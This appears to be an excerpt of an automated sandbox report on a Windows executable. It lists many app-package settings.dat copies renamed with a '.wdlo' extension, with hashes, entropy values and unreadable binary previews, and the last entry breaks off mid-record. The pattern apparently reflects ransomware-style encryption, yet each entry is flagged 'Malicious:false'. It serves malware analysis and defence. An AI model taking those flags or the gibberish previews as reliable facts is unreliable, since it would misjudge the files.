                  SHA-512:437ED8F93C0FE95C468E83692835F1641C45B51F70D6701ECA7E9A0B6372FE3829474BEDF8B304869B10126E5525F87FB76F6526701D977F92012E3296112978
                  Malicious:false
                  Preview:.....k..2A<_!K....; ..\.H..\;...3.%..f`.."...........2..&.0....Wi..*...}.cS...u;d.........p......|...j*r.M.D.5B...\...9....$+.34z...v.../....t..<")>;.o`.D .....7...Y#...IC....{....l&..b.&DX.~F..9U..=5.i.T|Zp..n&......?...a.Ga...v`7.6.m.]......u.gOt[..+..g ..n.%..i"j.*..m.....Wu>O......p....)..Q;.P.W....&_.."..&.3..J.J.R....@..tl.8.4G.._..$THW.Y2y..vR...d!./..X..v..n...3...?=...b.,..K...:?....!.....x..H&o+mB..>.....]`...).&?.8..*.R...0.Iz..[.."|5..._}.!.c.<.....yi=..|)RZUM..x.2s^0t.......n...i..Y..=.......T..$.q(..._...X~...Z7v.C...N.x2.u.a.......:...s..hT...`..S..J..8~._.w..\....P..d.[....E.^..}...............R....7*.?.7.. W<.."..R..Q.....1t}.......5....?J..4.E.-W8.kA.l....R....0T.P..........~.a...)c....3..v..S.p....@...^.g.Y...d<..Z.f...BA.ro.....A..N.?....{..S\..k.|..MS..b..i..{......Q..........Dnm.$....:..I..WOi.....$....|..J...|S..{...?~.........Xg/&....p5V.m...'9.v..[..Z..u=IOS..w4...K.o.I...V..Y.,..|.9.......$(.;t.b:N..#..3..P

                  C:\Users\user\Local Settings\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.975539813573799
                  Encrypted:false
                  SSDEEP:192:KBJkXiGuht5fabpDnHuSFe51BbBx8aUSinc4U:3D0tBalHRFe51BbBCwXn
                  MD5:1D7053BDD9B54E98FBB1A2BC697AD5F4
                  SHA1:1541E99F962A4CCC0A0317872A83CF125DD434B8
                  SHA-256:587623B49FB012356B6CABC6D41A4F5B1A179B7CCE8C85CEF88B5CF86AEDEEAB
                  SHA-512:6ABD1ED10C3A18BCB66F9E6D1130A3A4180B842D7226CE77661901E6AD299544C08D30092058CDC5039E40685BC20F46C7D5C7F77BF858ACA97954CF95C79F84
                  Malicious:false
                  Preview:regf......C".!..|mJ....M.].roif...|.../F]...uk... .P...gH.q..?......6.Y.e.L........?g.N..4M...^.*..&.......%...;.N.(X..4,s.m........'......^W.?...h.....p,..+..p.n.~A1....U..PD.9=.. ..Xd."L..|.7d...'.N.a.o...%.n......[.@Mny.wL...7...r......y..... .`BA.w6....t. ..QxD......+..-..C<~.k.vOYt&..`..CV...p.ef...Tl.R4.:;yA.....h.7..lE.D....:1...(.\i~e..FT..D.T.6..+.Q.....F....E..4.1Z..K......i.7TC...nD|.j.b....&........j..4........dp..4.N.{.sc...>...%...E#..}..s.=....Q.@.T.Y.O.q._..g..G..v.6.....+ <. .....p..P..........#......S#....d...c....zw.S.76.)..-...L.c..R.H9..)O.X.....3....0..i......w.o{:u1.By.:xp+l.P.a.. ..V.L.3..........m....C!..u...i......_....J..:...s.N..T]d...%...a..g..x.....9....h.g...g..T..mI}"..@p[\.....O)hG.Cb......hi..l![[.4.}..M!d.4$.]`,*E.P.|.T.RZ&h.!.*......(.0ev...%..0..x0...a.Y..._.;........2..7X...Yp...Wd.@..t..W:q.B.Ap...4.z.l......t...$...K.Q.`...B..`..8.}...{.z.%....(.4S|...$z.t..v.hI..&. =;0..Rk.e.P..SE>X.%.>.

                  C:\Users\user\Local Settings\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.979372438142767
                  Encrypted:false
                  SSDEEP:192:KykJJLpRPhZVM/R1a/+041EJosoZV+Glny3W01UzA6ZlKTjPZw8BbTnjvp1cd:MNRPhiR1a/+lESZzy3BxUlaw85TVW
                  MD5:26AF68CF5A9A4CB7A75B47BA2B9CC25A
                  SHA1:7AD91F209E867ACA584FF71004277A754FB6E80D
                  SHA-256:0D9F42FD71C0624A1715E3EF7D2DBB9D49FEEAD9CE2F2C2BF74319975E637A1D
                  SHA-512:8642D7546F2E68D991AC48D9E4EE2D292E0219C0E379F4162AC2602B62DF9790AC12CD18DBFA9E24B5446E05F570594961FCF049D16CE10DEF32C1FDEF9F4135
                  Malicious:false
                  Preview:regf....Wt.$U@8Ja....`*#.hNc.P.....H...V~..~9.......4 .j8.i.QV.C.7..~g......iV.zL..........*^.#...R-B/[3....7..}.+...Q..%{s.Z...,.n3...(X......31.\.....p.-7....#......Z...p.C6.H..vd ....R.....1WVb.....>Sx...n'..{....N-....O}.....swui..&X.3(..H_4~.. P..d.m...;_.!..1...(.I.H{d.,5....#....+...1.i.n_+$,...7.@N.T,..S.J..+(....Z8..C..P...m.f9..U?..YL.nB.....?.b..i.oso...dl..#7.lEhA7.j.+..%.F...5;...s.....].@I.._....v...4G.o.K..BZ....d...3...r.........y.r...}....<.H=......7........h"O..wa......*Br3....W.9..i.......9........W.....[ry.|Q.W.....F..5...@.z}eE*....G.L5.../..=.K..|.:`ul..R..z.G...........M..E.......Ok.D...T5.....s..{.a..M0.6......OIS.9.....Mk...$....ID.4Fe.b...93v2.2..5....0...v......w_..I`R.D]t.T..P...`?...ES...`.:..............u..p).v.-...K..._'..T..7..!......y.&i...3....".X..J..W.Qv.?.'....f.~{....\...Y.yg...~".9..xM..j..)*HH.~\...tt:p<...#.wE..)....S4......rX......&.f.....u..P...?..5.P4...,<.d...z."B#yC.1f.E.H..f..tY."..r;-..K5..tJ.

                  C:\Users\user\Local Settings\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.97912956412753
                  Encrypted:false
                  SSDEEP:96:ZAg/InIRl+F+nc7Te9TEJHkfZ0oV8e4xW1X9WQ/Z49RrpZx1hi5w07LgCGLdJWHm:+S7bedInYf4pu9T3i5wkz4d0nhtEL8LU
                  MD5:73FF556428A89DCF00A856790336ECC6
                  SHA1:DCEBE21646A94D6A3F77576BF70E3FD3EAB2C0A5
                  SHA-256:04FA55C0BA0E717E437C62DB6DA9BB4C4C4F183568DA1BCE5F221A4B92F464D5
                  SHA-512:2398832A5F71DDDB6FAC0A57B7B9C73955D8817238034823E81C639288777BC676CF5019DBDC613C6D739E4388A5F3295B8FF7C8AE05BBA3A1733A2B144F0177
                  Malicious:false
                  Preview:regf...!&...O.......G.K.2y....H..)..1..g.../.. .-8..z....._.Y..7zm2E..|..Xj..'...J..i.Yw,n..CR...C..0|....u.RTO..Xf.`...L.=..U'...U.z...-D.k..F.%>1..p...G.....4.bE...?.=...w!..`l...@.f.D.bo.J3../.$E5...\...w....1.......z..91...`.....*n..".6.->0k}4.'..}3d:o[.....\...2Hgg...G.;Y.@.P&Y....j.C@.......u.$.y...[.2q.l._o......".&V.'2i.@2.`..P9.h.....nP.`-....L3Wc$..|.m..y..m.....0........m.....O.3..M.*......MZ.6Y"V..7..ANSp_.[..FZ....._.b..X..}<.).....D.e.w.%~..@..../..u.._L..q..#...7....1.z.$E...7..U.V....U:......#...l.N]!S...91G..u.,.`.`,k..:#...:.J.{.4.....6_......+.t>c..DL'C.B..].b(....K,..G...#...@v.n.4..}V.Q...%.."....K..]..}....;......~.#....L....;..pR@.J.ty.iY..3.w[...K\r..C|....L.j.M.lT....6gh..<.b..'0.-..[.A....<..+j...:...`.7.r...Z.k..c,..r.../N..c.m.;..\H.ut6.?..f.-.h....Y.c.._...z... ..DN....6...h........M......O.Rf.....`.|..U..t.X..t=/Qjo=&v{..7C.Vx...J.-..8U.]........M.}.,.[...A..5.E.....V."...@.h....6gD~..!..,...40`...w......&.~.DO.

                  C:\Users\user\Local Settings\Packages\Microsoft.549981C3F5F10_8wekyb3d8bbwe\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.976088949988179
                  Encrypted:false
                  SSDEEP:96:VDgIm+N8NBLXmKwtskCW2BlxrYj7RxgtIvHOYV6gwzgEZuB/s3refrJMIahIj9W+:V7WXUsV67RGLdFAsbezJ3H9WvTdM
                  MD5:1EB207E6103F0A608B3BBD21C3F57466
                  SHA1:3C9D46755F4B1A9FB3EB63AC5F2D0BF819172B29
                  SHA-256:EE579704EC84F78AECBD7F4F2A583BE773B28DD865DB0AD18536155348595F4E
                  SHA-512:48A1E15A7B339C80268044F4C505809D0554297CF95D9C042CA4194F8938C54A24AF2F51C236DB9E9DD00AE3FA9D72EB648B87A55F4740E6E5D93C7730D0BD4C
                  Malicious:false
                  Preview:regf.....!^"3.T.{.FMs.M.{J.s..*..6..K+.;..t.....+...I.m..`z.I.~.."^..QPf.T%."..]M$.j.P....k..].DX.....[.W.7.. h. ..8......5.o[..a.G..AC.5%mx.A..1.*.i.....S.....B.!.=~..,.X......QU.\ob.V.u<...n...T./.\...4u.g....q!....j....T}..o.A.cI+..i......X.9.V...n`..g/0..'-.^...%:Q..5....c...+....s6..f..~..q..^c..LL..;..m._.L.&.O.;=.!.,..(.`.Y.......o.r...8..y..3...d.XF%h.:.[...D..?A... >H..N.3-.8.S].b.K..........5_.(.0.V..........P.~.X.dz..n....y.w.y;;..>L..t..g.g.i.. ..... *?.e...W".L.Q[..Vg.....3...#.#...2..[...%ZCM...o#.0..r.&..O....{.....<.....)04}.\..4s...0....u......m.......@3i.......h.).r+}K.Y4.g<Q....b..$H......s...8..........F.O3i.NL. .X.w...J...........5C...S.E.u..s(..7|.P.*.M_0G.;@2.N.7.M#..).S.0k.._...t..U..Fm...&.._.u.W2:H..[..S.....Lk9.HZ......R.VP5.].Q.......]. ..Vo.....,.._.5..^...P. .=ZG(C..0..l........?*...Z.,N...}M.a.m.0`....Syj..~.r.%......F.r..!.)\....<......_..G.......?.J.&.`..../..9.l..Y..~hh.J..T.....2...g...,...].....

                  C:\Users\user\Local Settings\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\settings.dat.LOG1.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.9822815023189575
                  Encrypted:false
                  SSDEEP:192:HmQvF3ecau33i4gVQWy1bKRUG8KEXUNjatJCwG7agYhzrNQ:HmQvF3643i4gFy1bYUzvtJpOWQ
                  MD5:B78574F6A1480F2EFD2DE9BE4ED4CE29
                  SHA1:F234D582563EEA5763D6F9B13683DD7F59FA9DE4
                  SHA-256:F1D53A644D9DC2473B71E7AFAD46EC065173A7D6077C72A38587DF5351111980
                  SHA-512:24FA59BFE94BC58844D0D6AB105500D1F0746985EBB015AD5FC098C577FAEC9D1D3DBB0281A586215206D46BDAD46BEB60B6470694E276E5EA7251A2D3A51789
                  Malicious:false
                  Preview:regf......e.L%.`.S.m.t.......d.G..Z.].B....A..E.$UU....I.......b..ho?...D....wJC.$2.o.}..*..f.....9Li.F.8..._.F#g...D%.A.b......Z.S..x.@..(....B"J,"..A0....Is&.S.q..'DT.Z-...Y....Q.CH>.`!p....;...t..J....7....k..U..P.-.Q..3l.D.../N..,`NQQ._....~...p.Y..Q.....9...X.).....1U?A>...J..6W.....&^..a.;.(..5.+..5..Y.H...~.....p.ha..)_..\!.L..d6-pD3.|^....z..6...WP..A........C...2...J66jf..H.....8.f..o....%.......q."z.}O*...w.7o3B....$w...8,...B..L|..$...........:qd...v,).m0MB$I..V...0X.%...:...R0.>E6~...r...+L...[\.i/.R>......mv..L..z.....Peg,...'...k>.*.H2oW-U.]..G.x.1....U.=C....".3vVf@....^.|6.F.38.l.K....I..;...n..0...wiF...A.l3.C#u.?.d.&...B%.(a.}.."tN...;....m.6.o.)r1....+.>....Yh.~#...*C...Rx.DI4.\.wo.n..=..10.K..... .|......t..$.I....8..\.+..j.[XS...D_.;.h...K..q.[..i.[....&.dH.....=. ..<.Q..sN8....G.S4..}.>.....(.......O..g{.b.."....>z.6nxC.^.K.t..YK.[.<. AT.J.m....P.w&./.<P..6RB.G..... m..B..S......dwL.J.cC.Jk...^..

                  C:\Users\user\Local Settings\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.975222454378052
                  Encrypted:false
                  SSDEEP:192:UvYE0gKyBbHUl4GV1SPXJKlHgws8SNsQ/jIFUWb:RSKy23yX8HgWlUMFtb
                  MD5:2F5E0C99F100FBBF0BB523FA1F9499BE
                  SHA1:65D91FD4F0F1A9E7AD7B3646A4B067D061129A38
                  SHA-256:91060A76D0BFCAA0A456C46A7C3DE7059F38A975B24AF277D7E0F4E3CFF963B7
                  SHA-512:53A2BB0759860C3927017359EB92AF6E9BED080D8A843CAC83565BA774CBB033F0E018CBF226A384CB842582561897B2EE1F8B972B444878AC6B17926612FA19
                  Malicious:false
                  Preview:regf...FN.}...q..\]I8(...`l..X8.(vgS.r._.{w..^.$..%...v.........i~fm..[.q..Rid......w..#P8-.9.^N.1. .>....^F&..6.4....U....%.....i.z..Zn+....7...?.2..Y.S..Sr.V.........SH#...4c..2v...../.f.z....L..........zTB}.f.....{..K...U*.....x.v..V.E.R.2+F.p,l.&..$~......+c...b ^..|=29......+.l$...U..\)Q.C.....UG<i.].Bq.Oeslx?m.J...y..}\>&9y..I.m...'.|.M.fC...C.u.....}.....S..W..W.S..|g..J....B..|5..u..fSw......M..P..=Q./.g.....VE......9..W..)..C...#0..*%.".....eRa/..L..Oi;..6.=`0.f........'...w........v..,...R..+QF.`.........S.|..D#W..5.f..w-.F.|V.mn..6..(=NFp;..B..m@r_...:1.t...d".K.cS.##.-../.._.~{SB.js.\...T..N..V..XT......&.:yE.^....j..o)u..<.0.`^..w...).D.".F_x..,...bH[G=.|..............H...^...X\#...VX[(\..D...J}.9.x,......x.\l.'..L./.Z0sl.~..B..z..{!.........`.B.W8x..?.1..1i..T..bH...."S..t.....kJ.Z...-.....g.)B....M,.-.`.&.5.J.."Ss..-.@8pp.o.w.......Y....)K.6.s.......I..P.5*>..;].c.I#.h.r.L.._.z..y.f."c.w.6..3.\$.....W..+.#.M...VzG.rC

                  C:\Users\user\Local Settings\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.978661863797139
                  Encrypted:false
                  SSDEEP:192:dLvlMP6qQK54svxPKiJdTsg0+J7UL2Wbgm/yjY3ttUJSj9zOi3nUqN:dRMP1QoLJdFJ7UzgmqktUMj96i3UqN
                  MD5:01EF7E6DB36E6052A2FC790631BC61B4
                  SHA1:B55E0364F8BCFAAB6CC12EBAA2E29ABECC010B86
                  SHA-256:FE4B5C09DEECBD776BCE43B90D4E6528029D783BA800EE910B96240AC9DC105C
                  SHA-512:C61BE8227FB69DDFBC823024827F48175FCC1D2FCDF987C1C444EAD095B9E2B3596A56AE6536F31848FCF49AFA3BAA8044CBD2BF41111C6B377E90FF9645F084
                  Malicious:false
                  Preview:regf..Ti.....q.0.eH....-.qf..k.~..\...}S..........m'...d.9x...>U?........._".Q!..j..uI...)l.)...>.KF.!...-..W...'...!.@n.4)U...5O_3R...FB..MP...S.o..R..-).ZtWz .7......3...~...e....X...9........KGmXm`....k.@"g...{8.W...=....A....g...x......<^.....,.....].....|5Q./.I.....<5.\8..7....&.n.........l.f.x,N)..c._....,.~I;.......M=...:..m..f....3.T..T....N..-.^!.\>....\..(.[.Na.).k...H...e?.j.]..k8..6^.....'5..0c9...il..B..l.....oY.&......q.W.*..y.8.(y._.....t...... =.5?...<e...y..(..0%D.X......c...n..P..p.l1M...q.t.f...J.Lix ...D.9.......!..r....-GA.....qVX...h...\=.8....F6.'k.L...8..5[...-.....F.<.M.1.=&....Y..../...z,.CQ=Om&@O.o.i.Jl.t........O..K...A.F.?A.F.;...D`..........^).............+!.y...W...~e...M.........Y......w.E...5A..H...=.H2^h.....i..s&Ch......P...VS"..y...$.3O....).:.....m...P..^'.z....r.......N.*.z:....>?..z..A.K.vFmp.......n.......`#7..;...~...t...P.:a..:^.L.4;.Q..0.x........P...9."H..........E.".m.....7..u2..t}>.j.q?q7I.B

                  C:\Users\user\Local Settings\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.9787547559714165
                  Encrypted:false
                  SSDEEP:192:+vqNc9gCsDBoVv3AuvU7LJe+tGNSQLHHeW8aCU5/:+vqNcB5FoLED5LHHeACU5/
                  MD5:0BBE842F1F1B30161DFF286AC9AF86D4
                  SHA1:350B8324E9133C661447D9C4AE9AC59300B92355
                  SHA-256:BD970171A95DB4A24ED3467AC516234A3787308A9F3FF08FCD3CE9D7A70CE0E4
                  SHA-512:B3783B63A9E41DDAEB073AC653876EC99F2CFBE5925EEBD6182CA3E0A3ECA754EACF38037E065EA7AC339780E3C350B77DE9E51D551AFB0BAC7C509824A11C46
                  Malicious:false
                  Preview:regf.v#...N..fz...r.%.1d.2......@n+.....R.>....2...MS.,.[..Q..N ?....!....H..8.~I..\7..9yk...s........ ...N.U..i..Z...N..g..Q.....#n. H.U.%jH..6...6mS.......{.x|Z.....m..e..M3.y.^L.plC_hU ... ....V.T...s...~-.V.(.b..}..3...-...i.....^N.^.......S..<..Gfv"..I.7Jo..0..m....dS..=...-l>]#.5..o...q...Bu..s...sc5.1`oQ.(..G.#}........?.>%7s......;.? .M.z.O.c.D.)..;...N.WFi...4......7.7l^p.i.&...?..;.".e.....:...2d)s....[...*....h.p.4.ljz..-........&..N.6...\j.K9.Z.`.D.W*.~..QIe....@..e......y......,.@.......C..K._.m..#..3....@.l....&.;.Z*.....R.i.\H.....6.u..`bR>#..%.8..W.D$,<...X-...].....b.l.z.o..=..Z.Fx.c.}F&..D8.>.k[.Sm.....d..U....~G..)....@.pe..5..Ru.Z...`....]...`j...fe.l..$d...!.2Dv7v.nS(+Zwp.]".....F......i..4.x...o..W09..c{..7.....1bXT.`b...\`2..g....`.|.[./p+.{...*0.....t..[i.....4R/....4...!...].......*.....&...j6."..1..T...."&e.....7..s,..$......z2....b.x.i.'.PhjR|.....K.......8...yN..Cw.&.]..?Y.....s...-4..v.|(..[...c$@s

                  C:\Users\user\Local Settings\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\Settings\settings.dat.LOG1.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.9804517625
                  Encrypted:false
                  SSDEEP:192:POKDW7r0jB3+t6XK8xCZS+GWBOkkXtFAQQ51c1Ze1XSW7heM65tPwSY:POu5BusXXEfGWBqrhQfcIbp2y
                  MD5:58BCD82432B660AD9DDB38AF5CB14D08
                  SHA1:C704D62A956E97540C76203F382C877AB1E2EED3
                  SHA-256:79FD90C7FC26E171F6C7AE01BC615594F07CA4FA6EBAC91F8F03C8C73B223E5B
                  SHA-512:4171FDA21FDCEA9A095C54D7E29D33E9B3CD8E7C8ABD5795CD1719CB39F9A3E50BE4056371746802B95F394689E1F1C8050BCAADE31F7E353B9B9C0960DEC06E
                  Malicious:false
                  Preview:regf.%~....Ck.nP.t;O..H0.nL[A.9([1?.s.*..>..o..0p.T.ct..b...@L..ZDn$.........JS..A..5..y.|I....*r/.......Bs-..R..PZ,.=.-...F....&...e.9...U......!z...F.Z<G.:.).......>Q.....<..R!qli:...F.D`..Zw..D...m.F...g8............M..r.I...)......s'E2-.:.)P.@6...w,j.fe5.d[..'7=E.Q6"..^_.4....;.X.x.O.x...uI....0..Z2..X.W.w..!.7.........s`'@.1..V...6@..'...i...!..`.+...S.UB.kW..!R.#/.. w..!,.?.}Ny... .O)3..c.....,.@....C..x..S..!nsve..'.$.:..+[?.....<.V..y.[.ng.... ...........\.`.ix..%.:...'......[#Z$....q...}..9......*n.`..&.5......\b.......Y$.uH..]....v.Y.ZaB...9..j.-.....t..1xPo.#.....=.........#...B.n.:...<.+...{.xUs.S....DI&.5R..0D....w.u.C..&w.i.......wjc.YDI.D.s4;.e.7~Q2.I.c.M}%@.x.j...b.:e..y.-2<WD'l.|..g.=B..fA.zU...O...SaLa....L.;D..............F..m.....D.A.F..6._z...Y=5mX%.....J....+Ky].3.-..Y!..k$.*.X....?.m..ya........T+a........S...`..M-..[*...U.}q..S..(h.5..'.b\C..f$.._l..%....X...6...RN$;..G.G.......MI.<*...d..q....).. .L..p.32..q.{...U

                  C:\Users\user\Local Settings\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.977815250151183
                  Encrypted:false
                  SSDEEP:192:QRsnAyf1lb0o4vdQMy+gTa0KlnFAkqiNsE11VcAy3Jw:QRsxf5wd7f2IF/Dx11V5x
                  MD5:62270ABEC580AFA2FB31B62C69789513
                  SHA1:552C9D15C27DB95B0719E881CF35F05ACF33D536
                  SHA-256:EA9EDF8CB9F74A37ACDBF4BBBE1CBB3EFAE411E3DB2D8530153B71833D9DEA54
                  SHA-512:30D9F6890BC368B740BAB073C367828FD16858A8F9363BB93F9902C9429F516D4355294DA5AFD30C5788FB87FB3AC065D4FAEFC47B373032BCEBB6F8DA48D1BD
                  Malicious:false
                  Preview:regf....`..g..3...6..9..u....-[.8+_QJ...Y.j...}....NKD.P..S....S..<...h..&.k.....u....Y.....w.f..'/.u|&..Y....3b....v.87.i.Uf..b.L....Q..M.."...^..s.<...K..dLZ.......em..T.../.^...@...h.5.G1.e...]v..B.$.`H....;GaZ.}dL[4.'...@....... .Z....Qms...n..;B......`.nC~..>.S.. U....ZI9..r...'... ......M..AB.fAs...P.I2...N.......<..^Kpe\.hl.j..6a .=.O...!.......v.PteVS.`....Fg.n..../.*-...J%.....n.8.<cQ![.....P@L.;H.I.....T).~..g.j\...[..}.B.......,.....0...D.._.El.?<.....J.)...L..W.....~C.&.G..y..`:..X.H.k~...DW.....G..K.A...f.....}QjC.b.oq....Y{...).'.c..R...W..:'.T&[..._...LT..n.+]..*.....u.F<.5 kQ...3|.VD.x.^.t7.s.<.t...._.p.....4..;J..h..8..H...N.7.Y>b.....O*.../@..w...G.kM....gS5\1OI.g.m}..D.x.....M....WS.[...GJ.........=.q..H./fs....+.....0....S..y..&..n....VsP.~...._.MP...... .Q..!q..)....B ...T.l$X...+.....6Y......30......_..=k..n.\c.P..._.B...3.O.%0.mZ.j\.d..."...E......F..h..h.>......uRY.r..!.m...y..?...?......IQ.......lT.?.}5.F.b.._=

                  C:\Users\user\Local Settings\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.977974438620406
                  Encrypted:false
                  SSDEEP:192:nWo1yqp1HEp+5K9vu1LGz906NWIj7V7zwCf6wLKk1fgwCOT:ntwA9HKZu4eqJj7dVCeaXOT
                  MD5:83EC407CB00959C62521A9D9B4AFAA6A
                  SHA1:295A1AB150D291C4132937C7E7836850BA550BE1
                  SHA-256:D7696D29741B54CE8656073A07391A829C3EB3C7E3315AF68992F6D6EA37F9C2
                  SHA-512:E835546E09A505C53568B4B40F48A41BE91D050405973707CB112CD3F07B1557167A86E71F49512318B91740B5B1E89EE39A02D8BDCD37CC51F0D6E8733ACDBE
                  Malicious:false
                  Preview:regf.j.J5.2\....3b....n...Vf..C.+.SDP.>.T@.&..%..q.......G<..E;vP3..>..5.r..D~A...Q@...i...=..Z!......{..#.9h..."}a.*.v..BE....*!O..S.Yi...2.......L...U..@.....!dJ3.T..t.............*a.....n...CgU...|S...b\.d....#..@...N.g.s^...M'..3Y.....LA4.sk6?...)H.hm....."..x....{0VAT.K...L([d...%dip4_........h.)...7-uuZ^^......I=.].(.q.}.b.+I....i.......i}...^{...[..^G.`....F.E..uL..5.l.&......+.W...8*..%FDH..F)$t._.$..\p..W...=...w.O....vIT/..R..q..yx.)]XRa...Z.....)t.N.........);...<..(8e#..Bm.=._.z............].....2.......0w..._..Ws..(...E.Z{.e~.../....T@.U.[..i....e...!.:.9.M.,\?..Tt,H:I..f.2H..d.}+....h Z.....N].Y....E.17*.!.h...c.!\...10....K...T.J.m.|.O..j.3.V/.z4..k..n.]...C.......up..r..a*..d.......~..&.C.1.e7..j.@S...t.....p.' ..s..Vi.3.y!rK..QY......$).C.D......d.....b.k"....k$$C...d..Q..Y.G..*).r..zW..Y....P.......~W..'..m..........h.....U..=....84.T......$.......t$6<\$.._..{f*|.#7U:.|Q(....q.`A=..N..B.O.*.cC...!..........l=.....<...

                  C:\Users\user\Local Settings\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.979275850403142
                  Encrypted:false
                  SSDEEP:192:9x1yOgTw/FREL0C9B1Z2iAwK0ty2eQ9HNyjVbuq0ma6bAmUMt/ibGmrJ:9xss/FREL0oB/2iAwK0C1Sq0ma8tojrJ
                  MD5:E8F960ABA078F0F67EDA61938A79170A
                  SHA1:2D1CCF5750F11B2466FA86F1A0A1E35053F28C93
                  SHA-256:5ACE1EEA68DE9EEEAB6B797ADC7F2F80584104CDD2397469019B74FB08B66F8C
                  SHA-512:988171D407D4CCACC5CC4F7392B51F2E4063209AE0DEFF1517D21C90532C935E856916FD32BEE6AFEF30A39C5B8EF2ADB787834FFE41D86CEDE4CD68CA2C435A
                  Malicious:false
                  Preview:regf.......=.#...d7.p...1B`Cd.z.s$.:.{......]+.C.EX...).....m...c.fo.j.=.N......b@...d,wA|N.L).V...wz... .A.|!..KI..s.i.:..Uq*%..p...R=VK..aU....Kt.e..B..p.~c...y...H..qa.....r...C......._.Ia-.D.f.d.s....v.}Y.<..16c..f...~.q..=....z[...4.U....V>C....)#..X..&r.*.....oW>..A8......./.N.8.J;Xn.....p]...se'}.S.:W..../...A......`..`........u!......C.1,+..U.B...d.J.D..*..W.6i1#N..........I..0T....2.g.l.7..=..P.(.......[..DT......(.*.Vh.....R..u...>......M..."....5..$.0".....K.pg...W.W..m..N.h.....W.5........tU."gM.c..8My..f.<.......Z".I.C.}...2..5]::.l....?l%..j-.bZ....!...K*.....p.|UU./..E.N=.....6.<}Z..g..d...wF.c;.... .OLt.\SJ...q{Nfm.."......n.B...D.69.S....Z.zd.....#.>\.......I.m.%....&......$B....m:N..U..YzXA..(.zx9.G?.?F..VM..x.K....Y. ..B.Oxg..?T....!..#.............=.^..T..X.......+Am`...X?{Z.Z.X7.s...VU..o.....9.U...,....%..E........V.......u.yr.v..bh...V. f...M.]..+...G+.2.@+./.]..a..F.Y./.P...~.s`e..c.Q..,ZV..x#...........y...""uyfcW.Z

                  C:\Users\user\Local Settings\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.977672200573252
                  Encrypted:false
                  SSDEEP:192:b0hMnyzGaHQ/pxkFExhjhkgT2h3I6hr0Lrl9EH2Nco5H:AhM4JHCTDoUrl6H8J
                  MD5:29B1724378AA9504DF00A8EF27844109
